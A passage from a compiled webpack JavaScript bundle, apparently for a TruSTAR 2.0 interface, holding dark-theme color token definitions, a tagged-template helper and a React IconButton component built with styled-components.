var SIDE_NAV_BAR = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var SIDE_NAV_BAR_HOVER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["TUNDORA"];

// Main Nav Bar
var SIDE_NAV_DROPRIGHT_MENU_ITEM = {
  BACKGROUND: SURFACE.hex,
  BACKGROUND_HOVER: BLACK.X500,
  TEXT: TEXT.hex,
  TEXT_HOVER: TEXT.hex,
  SHADOW: BLACK.X200,
  BORDER_RIGHT: TEXT.hex
};

var SETTINGS_PAGE_NAVLINK = SIDE_NAV_DROPRIGHT_MENU_ITEM;

/***/ }),
/* 3499 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export ACCENTS_ALERT */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ACCENTS_NEGATIVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return ACCENTS_POSITIVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return ACCENTS_WARNING; });
/* unused harmony export BACKGROUND_DIALOG */
/* unused harmony export BACKGROUND_FLOATING */
/* unused harmony export BACKGROUND_NAVIGATION */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return BACKGROUND_PAGE; });
/* unused harmony export BACKGROUND_POPUP */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return BACKGROUND_SECTION; });
/* unused harmony export BACKGROUND_SIDEBAR */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return CONTENT_ACTIVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return CONTENT_DEFAULT; });
/* unused harmony export CONTENT_DISABLED */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return CONTENT_INVERTED; });
/* unused harmony export CONTENT_MUTED */
/* unused harmony export INTERACTIVE_ACTIVEOVERLAY */
/* unused harmony export INTERACTIVE_DEFAULTBACKGROUND */
/* unused harmony export INTERACTIVE_DEFAULTBORDER */
/* unused harmony export INTERACTIVE_DESTRUCTIVEACTION */
/* unused harmony export INTERACTIVE_DESTRUCTIVEACTIONACTIVE */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return INTERACTIVE_DISABLEDBACKGROUND; });
/* unused harmony export INTERACTIVE_DISABLEDBORDER */
/* unused harmony export INTERACTIVE_FOCUSEDBORDER */
/* unused harmony export INTERACTIVE_HOVERBORDER */
/* unused harmony export INTERACTIVE_HOVEROVERLAY */
/* unused harmony export INTERACTIVE_DRAGOVERLAY */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return INTERACTIVE_PRIMARYACTION; });
/* unused harmony export INTERACTIVE_PRIMARYACTIONACTIVE */
/* unused harmony export INTERACTIVE_SELECTEDBACKGROUNDINVERTED */
/* unused harmony export INTERACTIVE_SELECTEDOVERLAY */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return NEUTRALS_GREY100; });
/* unused harmony export NEUTRALS_GREY200 */
/* unused harmony export NEUTRALS_GREY300 */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return NEUTRALS_GREY400; });
/* unused harmony export NEUTRALS_GREY500 */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return NEUTRALS_WHITE; });
/* unused harmony export SCRIM_BACKGROUND */
/* unused harmony export STATUS_CRITICAL */
/* unused harmony export STATUS_HIGH */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return STATUS_INFO; });
/* unused harmony export STATUS_LOW */
/* unused harmony export STATUS_MEDIUM */
/* unused harmony export STATUS_NORMAL */
/* unused harmony export BLUE */
/* unused harmony export BROWN */
/* unused harmony export GREEN */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return GREY; });
/* unused harmony export ORANGE */
/* unused harmony export PINK */
/* unused harmony export PURPLE */
/* unused harmony export RED */
/* unused harmony export TEAL */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__common_util__ = __webpack_require__(378);


var colorManifest = this;

/** dark values **/
var ACCENTS_ALERT = { "name": "accents_alert", "buttonText": "#fff", "hex": "#FF9750", "X900": "#FF9750", "X800": "#FF9750", "X700": "#FF9750", "X600": "#FF9750", "X500": "#FF9750", "X400": "#FF9750", "X300": "#FF9750", "X200": "#FF9750", "X100": "#FF9750", "X50": "#FF9750" };
var ACCENTS_NEGATIVE = { "name": "accents_negative", "buttonText": "#fff", "hex": "#FF5C5C", "X900": "#FF5C5C", "X800": "#FF5C5C", "X700": "#FF5C5C", "X600": "#FF5C5C", "X500": "#FF5C5C", "X400": "#FF5C5C", "X300": "#FF5C5C", "X200": "#FF5C5C", "X100": "#FF5C5C", "X50": "#FF5C5C" };
var ACCENTS_POSITIVE = { "name": "accents_positive", "buttonText": "#fff", "hex": "#27F561", "X900": "#27F561", "X800": "#27F561", "X700": "#27F561", "X600": "#27F561", "X500": "#27F561", "X400": "#27F561", "X300": "#27F561", "X200": "#27F561", "X100": "#27F561", "X50": "#27F561" };
var ACCENTS_WARNING = { "name": "accents_warning", "buttonText": "#fff", "hex": "#FFD442", "X900": "#FFD442", "X800": "#FFD442", "X700": "#FFD442", "X600": "#FFD442", "X500": "#FFD442", "X400": "#FFD442", "X300": "#FFD442", "X200": "#FFD442", "X100": "#FFD442", "X50": "#FFD442" };
var BACKGROUND_DIALOG = { "name": "background_dialog", "buttonText": "#fff", "hex": "#1E2024", "X900": "#1E2024", "X800": "#1E2024", "X700": "#1E2024", "X600": "#1E2024", "X500": "#1E2024", "X400": "#1E2024", "X300": "#1E2024", "X200": "#1E2024", "X100": "#1E2024", "X50": "#1E2024" };
var BACKGROUND_FLOATING = { "name": "background_floating", "buttonText": "#fff", "hex": "#FFFFFF", "X900": "#FFFFFF", "X800": "#FFFFFF", "X700": "#FFFFFF", "X600": "#FFFFFF", "X500": "#FFFFFF", "X400": "#FFFFFF", "X300": "#FFFFFF", "X200": "#FFFFFF", "X100": "#FFFFFF", "X50": "#FFFFFF" };
var BACKGROUND_NAVIGATION = { "name": "background_navigation", "buttonText": "#fff", "hex": "#08090A", "X900": "#08090A", "X800": "#08090A", "X700": "#08090A", "X600": "#08090A", "X500": "#08090A", "X400": "#08090A", "X300": "#08090A", "X200": "#08090A", "X100": "#08090A", "X50": "#08090A" };
var BACKGROUND_PAGE = { "name": "background_page", "buttonText": "#fff", "hex": "#111215", "X900": "#111215", "X800": "#111215", "X700": "#111215", "X600": "#111215", "X500": "#111215", "X400": "#111215", "X300": "#111215", "X200": "#111215", "X100": "#111215", "X50": "#111215" };
var BACKGROUND_POPUP = { "name": "background_popup", "buttonText": "#fff", "hex": "#27292E", "X900": "#27292E", "X800": "#27292E", "X700": "#27292E", "X600": "#27292E", "X500": "#27292E", "X400": "#27292E", "X300": "#27292E", "X200": "#27292E", "X100": "#27292E", "X50": "#27292E" };
var BACKGROUND_SECTION = { "name": "background_section", "buttonText": "#fff", "hex": "#1A1C20", "X900": "#1A1C20", "X800": "#1A1C20", "X700": "#1A1C20", "X600": "#1A1C20", "X500": "#1A1C20", "X400": "#1A1C20", "X300": "#1A1C20", "X200": "#1A1C20", "X100": "#1A1C20", "X50": "#1A1C20" };
var BACKGROUND_SIDEBAR = { "name": "background_sidebar", "buttonText": "#fff", "hex": "#0B0C0E", "X900": "#0B0C0E", "X800": "#0B0C0E", "X700": "#0B0C0E", "X600": "#0B0C0E", "X500": "#0B0C0E", "X400": "#0B0C0E", "X300": "#0B0C0E", "X200": "#0B0C0E", "X100": "#0B0C0E", "X50": "#0B0C0E" };
var CONTENT_ACTIVE = { "name": "content_active", "buttonText": "#fff", "hex": "rgba(255, 255, 255, 0.98)", "X900": "rgba(255, 255, 255, 0.98)", "X800": "rgba(255, 255, 255, 0.98)", "X700": "rgba(255, 255, 255, 0.98)", "X600": "rgba(255, 255, 255, 0.98)", "X500": "rgba(255, 255, 255, 0.98)", "X400": "rgba(255, 255, 255, 0.98)", "X300": "rgba(255, 255, 255, 0.98)", "X200": "rgba(255, 255, 255, 0.98)", "X100": "rgba(255, 255, 255, 0.98)", "X50": "rgba(255, 255, 255, 0.98)" };
var CONTENT_DEFAULT = { "name": "content_default", "buttonText": "#fff", "hex": "rgba(255, 255, 255, 0.7)", "X900": "rgba(255, 255, 255, 0.7)", "X800": "rgba(255, 255, 255, 0.7)", "X700": "rgba(255, 255, 255, 0.7)", "X600": "rgba(255, 255, 255, 0.7)", "X500": "rgba(255, 255, 255, 0.7)", "X400": "rgba(255, 255, 255, 0.7)", "X300": "rgba(255, 255, 255, 0.7)", "X200": "rgba(255, 255, 255, 0.7)", "X100": "rgba(255, 255, 255, 0.7)", "X50": "rgba(255, 255, 255, 0.7)" };
var CONTENT_DISABLED = { "name": "content_disabled", "buttonText": "#fff", "hex": "rgba(255, 255, 255, 0.3)", "X900": "rgba(255, 255, 255, 0.3)", "X800": "rgba(255, 255, 255, 0.3)", "X700": "rgba(255, 255, 255, 0.3)", "X600": "rgba(255, 255, 255, 0.3)", "X500": "rgba(255, 255, 255, 0.3)", "X400": "rgba(255, 255, 255, 0.3)", "X300": "rgba(255, 255, 255, 0.3)", "X200": "rgba(255, 255, 255, 0.3)", "X100": "rgba(255, 255, 255, 0.3)", "X50": "rgba(255, 255, 255, 0.3)" };
var CONTENT_INVERTED = { "name": "content_inverted", "buttonText": "#fff", "hex": "#000000", "X900": "#000000", "X800": "#000000", "X700": "#000000", "X600": "#000000", "X500": "#000000", "X400": "#000000", "X300": "#000000", "X200": "#000000", "X100": "#000000", "X50": "#000000" };
var CONTENT_MUTED = { "name": "content_muted", "buttonText": "#fff", "hex": "rgba(255, 255, 255, 0.5)", "X900": "rgba(255, 255, 255, 0.5)", "X800": "rgba(255, 255, 255, 0.5)", "X700": "rgba(255, 255, 255, 0.5)", "X600": "rgba(255, 255, 255, 0.5)", "X500": "rgba(255, 255, 255, 0.5)", "X400": "rgba(255, 255, 255, 0.5)", "X300": "rgba(255, 255, 255, 0.5)", "X200": "rgba(255, 255, 255, 0.5)", "X100": "rgba(255, 255, 255, 0.5)", "X50": "rgba(255, 255, 255, 0.5)" };
var INTERACTIVE_ACTIVEOVERLAY = { "name": "interactive_activeOverlay", "buttonText": "#fff", "hex": "rgba(0, 0, 0, 0.2)", "X900": "rgba(0, 0, 0, 0.2)", "X800": "rgba(0, 0, 0, 0.2)", "X700": "rgba(0, 0, 0, 0.2)", "X600": "rgba(0, 0, 0, 0.2)", "X500": "rgba(0, 0, 0, 0.2)", "X400": "rgba(0, 0, 0, 0.2)", "X300": "rgba(0, 0, 0, 0.2)", "X200": "rgba(0, 0, 0, 0.2)", "X100": "rgba(0, 0, 0, 0.2)", "X50": "rgba(0, 0, 0, 0.2)" };
var INTERACTIVE_DEFAULTBACKGROUND = { "name": "interactive_defaultBackground", "buttonText": "#fff", "hex": "#272A2F", "X900": "#272A2F", "X800": "#272A2F", "X700": "#272A2F", "X600": "#272A2F", "X500": "#272A2F", "X400": "#272A2F", "X300": "#272A2F", "X200": "#272A2F", "X100": "#272A2F", "X50": "#272A2F" };
var INTERACTIVE_DEFAULTBORDER = { "name": "interactive_defaultBorder", "buttonText": "#fff", "hex": "rgba(255, 255, 255, 0.5)", "X900": "rgba(255, 255, 255, 0.5)", "X800": "rgba(255, 255, 255, 0.5)", "X700": "rgba(255, 255, 255, 0.5)", "X600": "rgba(255, 255, 255, 0.5)", "X500": "rgba(255, 255, 255, 0.5)", "X400": "rgba(255, 255, 255, 0.5)", "X300": "rgba(255, 255, 255, 0.5)", "X200": "rgba(255, 255, 255, 0.5)", "X100": "rgba(255, 255, 255, 0.5)", "X50": "rgba(255, 255, 255, 0.5)" };
var INTERACTIVE_DESTRUCTIVEACTION = { "name": "interactive_destructiveAction", "buttonText": "#fff", "hex": "#F36464", "X900": "#F36464", "X800": "#F36464", "X700": "#F36464", "X600": "#F36464", "X500": "#F36464", "X400": "#F36464", "X300": "#F36464", "X200": "#F36464", "X100": "#F36464", "X50": "#F36464" };
var INTERACTIVE_DESTRUCTIVEACTIONACTIVE = { "name": "interactive_destructiveActionActive", "buttonText": "#fff", "hex": "#CC4A4A", "X900": "#CC4A4A", "X800": "#CC4A4A", "X700": "#CC4A4A", "X600": "#CC4A4A", "X500": "#CC4A4A", "X400": "#CC4A4A", "X300": "#CC4A4A", "X200": "#CC4A4A", "X100": "#CC4A4A", "X50": "#CC4A4A" };
var INTERACTIVE_DISABLEDBACKGROUND = { "name": "interactive_disabledBackground", "buttonText": "#fff", "hex": "rgba(255, 255, 255, 0.15)", "X900": "rgba(255, 255, 255, 0.15)", "X800": "rgba(255, 255, 255, 0.15)", "X700": "rgba(255, 255, 255, 0.15)", "X600": "rgba(255, 255, 255, 0.15)", "X500": "rgba(255, 255, 255, 0.15)", "X400": "rgba(255, 255, 255, 0.15)", "X300": "rgba(255, 255, 255, 0.15)", "X200": "rgba(255, 255, 255, 0.15)", "X100": "rgba(255, 255, 255, 0.15)", "X50": "rgba(255, 255, 255, 0.15)" };
var INTERACTIVE_DISABLEDBORDER = { "name": "interactive_disabledBorder", "buttonText": "#fff", "hex": "rgba(255, 255, 255, 0.3)", "X900": "rgba(255, 255, 255, 0.3)", "X800": "rgba(255, 255, 255, 0.3)", "X700": "rgba(255, 255, 255, 0.3)", "X600": "rgba(255, 255, 255, 0.3)", "X500": "rgba(255, 255, 255, 0.3)", "X400": "rgba(255, 255, 255, 0.3)", "X300": "rgba(255, 255, 255, 0.3)", "X200": "rgba(255, 255, 255, 0.3)", "X100": "rgba(255, 255, 255, 0.3)", "X50": "rgba(255, 255, 255, 0.3)" };
var INTERACTIVE_FOCUSEDBORDER = { "name": "interactive_focusedBorder", "buttonText": "#fff", "hex": "#3777C4", "X900": "#3777C4", "X800": "#3777C4", "X700": "#3777C4", "X600": "#3777C4", "X500": "#3777C4", "X400": "#3777C4", "X300": "#3777C4", "X200": "#3777C4", "X100": "#3777C4", "X50": "#3777C4" };
var INTERACTIVE_HOVERBORDER = { "name": "interactive_hoverBorder", "buttonText": "#fff", "hex": "rgba(255, 255, 255, 0.7)", "X900": "rgba(255, 255, 255, 0.7)", "X800": "rgba(255, 255, 255, 0.7)", "X700": "rgba(255, 255, 255, 0.7)", "X600": "rgba(255, 255, 255, 0.7)", "X500": "rgba(255, 255, 255, 0.7)", "X400": "rgba(255, 255, 255, 0.7)", "X300": "rgba(255, 255, 255, 0.7)", "X200": "rgba(255, 255, 255, 0.7)", "X100": "rgba(255, 255, 255, 0.7)", "X50": "rgba(255, 255, 255, 0.7)" };
var INTERACTIVE_HOVEROVERLAY = { "name": "interactive_hoverOverlay", "buttonText": "#fff", "hex": "rgba(255, 255, 255, 0.05)", "X900": "rgba(255, 255, 255, 0.05)", "X800": "rgba(255, 255, 255, 0.05)", "X700": "rgba(255, 255, 255, 0.05)", "X600": "rgba(255, 255, 255, 0.05)", "X500": "rgba(255, 255, 255, 0.05)", "X400": "rgba(255, 255, 255, 0.05)", "X300": "rgba(255, 255, 255, 0.05)", "X200": "rgba(255, 255, 255, 0.05)", "X100": "rgba(255, 255, 255, 0.05)", "X50": "rgba(255, 255, 255, 0.05)" };
var INTERACTIVE_DRAGOVERLAY = { "name": "interactive_dragOverlay", "buttonText": "#fff", "hex": "rgba(57, 147, 255, 0.16)", "X900": "rgba(57, 147, 255, 0.16)", "X800": "rgba(57, 147, 255, 0.16)", "X700": "rgba(57, 147, 255, 0.16)", "X600": "rgba(57, 147, 255, 0.16)", "X500": "rgba(57, 147, 255, 0.16)", "X400": "rgba(57, 147, 255, 0.16)", "X300": "rgba(57, 147, 255, 0.16)", "X200": "rgba(57, 147, 255, 0.16)", "X100": "rgba(57, 147, 255, 0.16)", "X50": "rgba(57, 147, 255, 0.16)" };
var INTERACTIVE_PRIMARYACTION = { "name": "interactive_primaryAction", "buttonText": "#fff", "hex": "#3993FF", "X900": "#3993FF", "X800": "#3993FF", "X700": "#3993FF", "X600": "#3993FF", "X500": "#3993FF", "X400": "#3993FF", "X300": "#3993FF", "X200": "#3993FF", "X100": "#3993FF", "X50": "#3993FF" };
var INTERACTIVE_PRIMARYACTIONACTIVE = { "name": "interactive_primaryActionActive", "buttonText": "#fff", "hex": "#3476CC", "X900": "#3476CC", "X800": "#3476CC", "X700": "#3476CC", "X600": "#3476CC", "X500": "#3476CC", "X400": "#3476CC", "X300": "#3476CC", "X200": "#3476CC", "X100": "#3476CC", "X50": "#3476CC" };
var INTERACTIVE_SELECTEDBACKGROUNDINVERTED = { "name": "interactive_selectedBackgroundInverted", "buttonText": "#fff", "hex": "rgba(255, 255, 255, 0.2)", "X900": "rgba(255, 255, 255, 0.2)", "X800": "rgba(255, 255, 255, 0.2)", "X700": "rgba(255, 255, 255, 0.2)", "X600": "rgba(255, 255, 255, 0.2)", "X500": "rgba(255, 255, 255, 0.2)", "X400": "rgba(255, 255, 255, 0.2)", "X300": "rgba(255, 255, 255, 0.2)", "X200": "rgba(255, 255, 255, 0.2)", "X100": "rgba(255, 255, 255, 0.2)", "X50": "rgba(255, 255, 255, 0.2)" };
var INTERACTIVE_SELECTEDOVERLAY = { "name": "interactive_selectedOverlay", "buttonText": "#fff", "hex": "rgba(255, 255, 255, 0.1)", "X900": "rgba(255, 255, 255, 0.1)", "X800": "rgba(255, 255, 255, 0.1)", "X700": "rgba(255, 255, 255, 0.1)", "X600": "rgba(255, 255, 255, 0.1)", "X500": "rgba(255, 255, 255, 0.1)", "X400": "rgba(255, 255, 255, 0.1)", "X300": "rgba(255, 255, 255, 0.1)", "X200": "rgba(255, 255, 255, 0.1)", "X100": "rgba(255, 255, 255, 0.1)", "X50": "rgba(255, 255, 255, 0.1)" };
var NEUTRALS_GREY100 = { "name": "neutrals_grey100", "buttonText": "#fff", "hex": "#33343B", "X900": "#33343B", "X800": "#33343B", "X700": "#33343B", "X600": "#33343B", "X500": "#33343B", "X400": "#33343B", "X300": "#33343B", "X200": "#33343B", "X100": "#33343B", "X50": "#33343B" };
var NEUTRALS_GREY200 = { "name": "neutrals_grey200", "buttonText": "#fff", "hex": "#43454B", "X900": "#43454B", "X800": "#43454B", "X700": "#43454B", "X600": "#43454B", "X500": "#43454B", "X400": "#43454B", "X300": "#43454B", "X200": "#43454B", "X100": "#43454B", "X50": "#43454B" };
var NEUTRALS_GREY300 = { "name": "neutrals_grey300", "buttonText": "#fff", "hex": "#505158", "X900": "#505158", "X800": "#505158", "X700": "#505158", "X600": "#505158", "X500": "#505158", "X400": "#505158", "X300": "#505158", "X200": "#505158", "X100": "#505158", "X50": "#505158" };
var NEUTRALS_GREY400 = { "name": "neutrals_grey400", "buttonText": "#fff", "hex": "#818285", "X900": "#818285", "X800": "#818285", "X700": "#818285", "X600": "#818285", "X500": "#818285", "X400": "#818285", "X300": "#818285", "X200": "#818285", "X100": "#818285", "X50": "#818285" };
var NEUTRALS_GREY500 = { "name": "neutrals_grey500", "buttonText": "#fff", "hex": "#ACACAD", "X900": "#ACACAD", "X800": "#ACACAD", "X700": "#ACACAD", "X600": "#ACACAD", "X500": "#ACACAD", "X400": "#ACACAD", "X300": "#ACACAD", "X200": "#ACACAD", "X100": "#ACACAD", "X50": "#ACACAD" };
var NEUTRALS_WHITE = { "name": "neutrals_white", "buttonText": "#fff", "hex": "#FFFFFF", "X900": "#FFFFFF", "X800": "#FFFFFF", "X700": "#FFFFFF", "X600": "#FFFFFF", "X500": "#FFFFFF", "X400": "#FFFFFF", "X300": "#FFFFFF", "X200": "#FFFFFF", "X100": "#FFFFFF", "X50": "#FFFFFF" };
var SCRIM_BACKGROUND = { "name": "scrim_background", "buttonText": "#fff", "hex": "rgba(0, 0, 0, 0.8)", "X900": "rgba(0, 0, 0, 0.8)", "X800": "rgba(0, 0, 0, 0.8)", "X700": "rgba(0, 0, 0, 0.8)", "X600": "rgba(0, 0, 0, 0.8)", "X500": "rgba(0, 0, 0, 0.8)", "X400": "rgba(0, 0, 0, 0.8)", "X300": "rgba(0, 0, 0, 0.8)", "X200": "rgba(0, 0, 0, 0.8)", "X100": "rgba(0, 0, 0, 0.8)", "X50": "rgba(0, 0, 0, 0.8)" };
var STATUS_CRITICAL = { "name": "status_critical", "buttonText": "#fff", "hex": "#A81916", "X900": "#A81916", "X800": "#A81916", "X700": "#A81916", "X600": "#A81916", "X500": "#A81916", "X400": "#A81916", "X300": "#A81916", "X200": "#A81916", "X100": "#A81916", "X50": "#A81916" };
var STATUS_HIGH = { "name": "status_high", "buttonText": "#fff", "hex": "#EC4B43", "X900": "#EC4B43", "X800": "#EC4B43", "X700": "#EC4B43", "X600": "#EC4B43", "X500": "#EC4B43", "X400": "#EC4B43", "X300": "#EC4B43", "X200": "#EC4B43", "X100": "#EC4B43", "X50": "#EC4B43" };
var STATUS_INFO = { "name": "status_info", "buttonText": "#fff", "hex": "#61CAFA", "X900": "#61CAFA", "X800": "#61CAFA", "X700": "#61CAFA", "X600": "#61CAFA", "X500": "#61CAFA", "X400": "#61CAFA", "X300": "#61CAFA", "X200": "#61CAFA", "X100": "#61CAFA", "X50": "#61CAFA" };
var STATUS_LOW = { "name": "status_low", "buttonText": "#fff", "hex": "#FAE75F", "X900": "#FAE75F", "X800": "#FAE75F", "X700": "#FAE75F", "X600": "#FAE75F", "X500": "#FAE75F", "X400": "#FAE75F", "X300": "#FAE75F", "X200": "#FAE75F", "X100": "#FAE75F", "X50": "#FAE75F" };
var STATUS_MEDIUM = { "name": "status_medium", "buttonText": "#fff", "hex": "#F5B53F", "X900": "#F5B53F", "X800": "#F5B53F", "X700": "#F5B53F", "X600": "#F5B53F", "X500": "#F5B53F", "X400": "#F5B53F", "X300": "#F5B53F", "X200": "#F5B53F", "X100": "#F5B53F", "X50": "#F5B53F" };
var STATUS_NORMAL = { "name": "status_normal", "buttonText": "#fff", "hex": "#85EB48", "X900": "#85EB48", "X800": "#85EB48", "X700": "#85EB48", "X600": "#85EB48", "X500": "#85EB48", "X400": "#85EB48", "X300": "#85EB48", "X200": "#85EB48", "X100": "#85EB48", "X50": "#85EB48" };
var BLUE = { "name": "blue", "buttonText": "#fff", "hex": "#6CD0F0", "X900": "#6CD0F0", "X800": "#6CD0F0", "X700": "#6CD0F0", "X600": "#6CD0F0", "X500": "#6CD0F0", "X400": "#6CD0F0", "X300": "#6CD0F0", "X200": "#6CD0F0", "X100": "#6CD0F0", "X50": "#6CD0F0" };
var BROWN = { "name": "brown", "buttonText": "#fff", "hex": "#FCCF87", "X900": "#FCCF87", "X800": "#FCCF87", "X700": "#FCCF87", "X600": "#FCCF87", "X500": "#FCCF87", "X400": "#FCCF87", "X300": "#FCCF87", "X200": "#FCCF87", "X100": "#FCCF87", "X50": "#FCCF87" };
var GREEN = { "name": "green", "buttonText": "#fff", "hex": "#CEF06C", "X900": "#CEF06C", "X800": "#CEF06C", "X700": "#CEF06C", "X600": "#CEF06C", "X500": "#CEF06C", "X400": "#CEF06C", "X300": "#CEF06C", "X200": "#CEF06C", "X100": "#CEF06C", "X50": "#CEF06C" };
var GREY = { "name": "grey", "buttonText": "#fff", "hex": "#7D7D7D", "X900": "#7D7D7D", "X800": "#7D7D7D", "X700": "#7D7D7D", "X600": "#7D7D7D", "X500": "#7D7D7D", "X400": "#7D7D7D", "X300": "#7D7D7D", "X200": "#7D7D7D", "X100": "#7D7D7D", "X50": "#7D7D7D" };
var ORANGE = { "name": "orange", "buttonText": "#fff", "hex": "#F7933F", "X900": "#F7933F", "X800": "#F7933F", "X700": "#F7933F", "X600": "#F7933F", "X500": "#F7933F", "X400": "#F7933F", "X300": "#F7933F", "X200": "#F7933F", "X100": "#F7933F", "X50": "#F7933F" };
var PINK = { "name": "pink", "buttonText": "#fff", "hex": "#F494E5", "X900": "#F494E5", "X800": "#F494E5", "X700": "#F494E5", "X600": "#F494E5", "X500": "#F494E5", "X400": "#F494E5", "X300": "#F494E5", "X200": "#F494E5", "X100": "#F494E5", "X50": "#F494E5" };
var PURPLE = { "name": "purple", "buttonText": "#fff", "hex": "#A870EF", "X900": "#A870EF", "X800": "#A870EF", "X700": "#A870EF", "X600": "#A870EF", "X500": "#A870EF", "X400": "#A870EF", "X300": "#A870EF", "X200": "#A870EF", "X100": "#A870EF", "X50": "#A870EF" };
var RED = { "name": "red", "buttonText": "#fff", "hex": "#E85B79", "X900": "#E85B79", "X800": "#E85B79", "X700": "#E85B79", "X600": "#E85B79", "X500": "#E85B79", "X400": "#E85B79", "X300": "#E85B79", "X200": "#E85B79", "X100": "#E85B79", "X50": "#E85B79" };
var TEAL = { "name": "teal", "buttonText": "#fff", "hex": "#45D4BA", "X900": "#45D4BA", "X800": "#45D4BA", "X700": "#45D4BA", "X600": "#45D4BA", "X500": "#45D4BA", "X400": "#45D4BA", "X300": "#45D4BA", "X200": "#45D4BA", "X100": "#45D4BA", "X50": "#45D4BA" };

for (var color in colorManifest) {
  // $flowIgnore
  colorManifest[color].hover = __WEBPACK_IMPORTED_MODULE_0__common_util__["c" /* getHoverShade */];
}

/***/ }),
/* 3500 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = _taggedTemplateLiteralLoose;
function _taggedTemplateLiteralLoose(strings, raw) {
  if (!raw) {
    raw = strings.slice(0);
  }

  strings.raw = raw;
  return strings;
}

/***/ }),
/* 3501 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return IconButton; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return IconButtonPure; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__BaseButton__ = __webpack_require__(526);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes__ = __webpack_require__(77);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__ = __webpack_require__(42);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }








var StyledIconButton = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2__BaseButton__["a" /* default */]).withConfig({
  displayName: 'IconButton__StyledIconButton',
  componentId: 'sc-1vweb2q-0'
})(['padding-right:', ';i{margin-right:', ';}', ''], function (_ref) {
  var padButton = _ref.padButton;
  return padButton ? '1.75rem' : '1.25rem';
}, function (_ref2) {
  var padButton = _ref2.padButton;
  return padButton ? '0.5rem' : '0';
}, function (_ref3) {
  var iconToTheRight = _ref3.iconToTheRight,
      padButton = _ref3.padButton;
  return Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["b" /* css */])(['padding-left:', ';i{margin-left:', ';}'], padButton ? '1.75rem' : '1.25rem', padButton ? '0.5rem' : '0');
});

var StyledIconButtonPure = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2__BaseButton__["a" /* default */]).withConfig({
  displayName: 'IconButton__StyledIconButtonPure',
  componentId: 'sc-1vweb2q-1'
})(['&&{padding:0.75rem;', '}'], function (_ref4) {
  var glowHover = _ref4.glowHover;
  return glowHover && Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["b" /* css */])(['&:hover{.icon{font-weight:800;text-shadow:0px 0px 2px;}}']);
});

var IconButton = function IconButton(_ref5) {
  var icon = _ref5.icon,
      thin = _ref5.thin,
      children = _ref5.children,
      iconToTheRight = _ref5.iconToTheRight,
      props = _objectWithoutProperties(_ref5, ['icon', 'thin', 'children', 'iconToTheRight']);

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    StyledIconButton,
    _extends({ padButton: children }, props),
    !iconToTheRight && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["o" /* Icon */], { icon: icon, fontWeight: thin ? 400 : 800 }),
    children,
    iconToTheRight && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["o" /* Icon */], { icon: icon, fontWeight: thin ? 400 : 800 })
  );
};

var IconButtonPure = function IconButtonPure(_ref6) {
  var icon = _ref6.icon,
      large = _ref6.large,
      small = _ref6.small,
      iconSize = _ref6.iconSize,
      props = _objectWithoutProperties(_ref6, ['icon', 'large', 'small', 'iconSize']);

  var iconFontSize = large ? '1.75rem' : small ? '1rem' : '1.5rem';
  if (iconSize) iconFontSize = iconSize;

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    StyledIconButtonPure,
    props,
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["o" /* Icon */], {
      icon: icon,
      fontSize: iconFontSize,
      fontWeight: props.thin ? 400 : 800
    })
  );
};



/***/ }),
/* 3502 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
